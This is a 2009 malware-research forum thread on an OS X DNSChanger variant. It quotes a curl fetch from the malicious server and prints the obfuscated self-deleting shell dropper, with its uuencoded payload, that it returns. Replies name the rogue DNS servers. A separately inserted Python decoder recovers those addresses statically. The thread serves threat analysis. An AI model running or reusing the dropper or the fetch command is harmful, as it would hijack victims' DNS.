Malware Domain List

Malware Related => Malicious Domains => Zlkon.lv => Topic started by: MarcusB on April 18, 2009, 04:43:25 am

Title: hs.2-109.zlkon.lv - (94.247.2.109)
Post by: MarcusB on April 18, 2009, 04:43:25 am
OSX version of DNSChanger contacts "94.247.2.109" with User-Agent "i386;0;7777;my_hostname;" to download another shell script at "/cgi-bin/generator.pl", which contains the IPs to change the host's DNS server IPs to.

http://www.virustotal.com/analisis/00b8a659101f9a3446a6d88f1379ff31


Quote
curl -A 'i386;0;7777;my_hostname;' 94.247.2.109/cgi-bin/generator.pl
#!/bin/sh
tail -11 $0 | uudecode -o /dev/stdout | sed 's/TEERTS/'`echo ml.pll.oop.ojo | tr iopjklbnmv 0123456789`'/' | sed 's/CIGAM/'`echo ml.pll.oop.ojk | tr iopjklbnmv 0123456789`'/'| sh && rm $0 && exit
begin 777 mac
M(R$O8FEN+W-H"G!A=&@](B],:6)R87)Y+TEN=&5R;F5T(%!L=6<M26YS(@H*
M5E@Q/2)414525%,B"E98,CTB0TE'04TB"@I04TE$/20H("@O=7-R+W-B:6XO
M<V-U=&EL('P@9W)E<"!0<FEM87)Y4V5R=FEC92!\('-E9"`M92`G<R\N*E!R
M:6UA<GE397)V:6-E(#H@+R\G*3P\($5/1@IO<&5N"F=E="!3=&%T93HO3F5T
M=V]R:R]';&]B86PO25!V-`ID+G-H;W<*<75I=`I%3T8**0H*+W5S<B]S8FEN
M+W-C=71I;"`\/"!%3T8*;W!E;@ID+FEN:70*9"YA9&0@4V5R=F5R061D<F5S
M<V5S("H@)%98,2`D5E@R"G-E="!3=&%T93HO3F5T=V]R:R]397)V:6-E+R10
14TE$+T1.4PIQ=6ET"D5/1@H`
`
end
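Added example (not part of the original post, and not the poster's code): the header line of the quoted script hides its two substitution values behind a tr letter-to-digit mapping, so they can be recovered statically without running the download. The function names are this example's own; the input line is copied from the quoted output above.

```python
import ipaddress
import re

# Header line of the dropper, copied from the quoted curl output in the first post.
DROPPER_LINE = r"""tail -11 $0 | uudecode -o /dev/stdout | sed 's/TEERTS/'`echo ml.pll.oop.ojo | tr iopjklbnmv 0123456789`'/' | sed 's/CIGAM/'`echo ml.pll.oop.ojk | tr iopjklbnmv 0123456789`'/'| sh && rm $0 && exit"""

# Shape matched: sed 's/<PLACEHOLDER>/'`echo <encoded> | tr <src> <dst>`'/'
SUBST_RE = re.compile(
    r"sed\s+'s/(?P<placeholder>[^/']+)/'"
    r"`echo\s+(?P<encoded>\S+)\s*\|\s*tr\s+(?P<src>\S+)\s+(?P<dst>\S+)`'/'"
)


def emulate_tr(text, src, dst):
    """Emulate `tr SRC DST` for plain character sets (no ranges or classes)."""
    if len(src) != len(dst):
        raise ValueError("tr sets differ in length; not handled here")
    return text.translate(str.maketrans(src, dst))


def extract_substitutions(line):
    """Return {placeholder: decoded value} without executing anything."""
    out = {}
    for m in SUBST_RE.finditer(line):
        out[m["placeholder"]] = emulate_tr(m["encoded"], m["src"], m["dst"])
    return out


def dns_indicators(line):
    """Keep only decoded values that parse as IPv4 addresses."""
    found = {}
    for name, value in extract_substitutions(line).items():
        try:
            found[name] = str(ipaddress.IPv4Address(value))
        except ipaddress.AddressValueError:
            continue  # decoded text is not an address; skip it
    return found


if __name__ == "__main__":
    for name, ip in dns_indicators(DROPPER_LINE).items():
        print(f"{name} -> {ip}")
```

The decoded values apply to the script exactly as quoted in this post; the placeholders TEERTS and CIGAM are what the sed commands replace in the uudecoded payload before it is piped to sh.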
Title: Re: hs.2-109.zlkon.lv - (94.247.2.109)
Post by: Serg on April 20, 2009, 10:37:00 am
In the script, the DNS servers are
Code:
85.255.112.130
85.255.112.170
Could you provide a link (maybe VirusTotal) to "install.pkg"?
Title: Re: hs.2-109.zlkon.lv - (94.247.2.109)
Post by: SysAdMini on April 20, 2009, 10:41:18 am
Quote
In the script, the DNS servers are
Code:
85.255.112.130
85.255.112.170
Could you provide a link (maybe VirusTotal) to "install.pkg"?

Are you looking for the OSX DNSChanger?

http://www.malwaredomainlist.com/mdl.php?search=MAC+OSX%2FRSPlug-F&colsearch=All&quantity=50
Title: Re: hs.2-109.zlkon.lv - (94.247.2.109)
Post by: MarcusB on April 20, 2009, 08:13:00 pm
.dmg file
http://www.virustotal.com/analisis/50d87c48d0299d43c012dba40ea346a5

install.pkg
http://www.virustotal.com/analisis/2133cd3427ac6b8a06f00b1512a00801

the malware that begins the process of infection
http://www.virustotal.com/analisis/e25bc9107152c6170dab471b16e191b5
Title: Re: hs.2-109.zlkon.lv - (94.247.2.109)
Post by: Serg on April 20, 2009, 08:17:45 pm
Thank you!